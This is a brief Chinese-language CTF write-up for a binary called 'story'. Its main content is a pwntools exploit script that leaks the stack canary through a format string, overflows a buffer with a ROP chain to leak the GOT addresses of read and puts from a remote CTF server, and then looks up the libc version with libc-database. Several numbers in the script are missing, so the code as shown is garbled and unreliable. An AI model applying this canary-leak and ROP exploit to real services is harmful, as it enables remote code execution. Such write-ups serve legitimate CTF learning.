记录下学到的姿势,利用信息泄露得到服务器libc 至少两个函数偏移,利用libc-databse得到服务器libc版本
泄露脚本如下
from pwn import *
context.log_level='DEBUG'
r=remote('ctf2.linkedbyx.com',)
#r=process('./story')
elf=ELF('./story')
'''
rop_chain=
payload='a'*0x90+canary+'b'*+rop_chain
r.sendlineafter('Tell me the size of your story:',payload)
'''
'''
0x0000000000400bd3 : pop rdi ; ret
'''
main=0x0000000000400876
r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(),)
success('canary:'+hex(canary))
payload='a'*0x88+p64(canary)+'b'*+p64(0x0000000000400bd3)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','')
r.sendlineafter(':',payload)
read=r.recv()
print read
#success('read:'+hex(read))
#r.interactive()
r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(),)
success('canary:'+hex(canary))
payload='a'*0x88+p64(canary)+'b'*+p64(0x0000000000400bd3)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','')
r.sendlineafter(':',payload)
puts=r.recv()
print puts
r.interactive()
之后./find read 250 puts 690即可泄露服务器libc
root@snip3r:~/libc-database# ./find read puts
ubuntu-xenial-amd64-libc6 (id libc6_2.-0ubuntu10_amd64)
archive-glibc (id libc6_2.-0ubuntu11_amd64)
有了libc直接构造ROP即可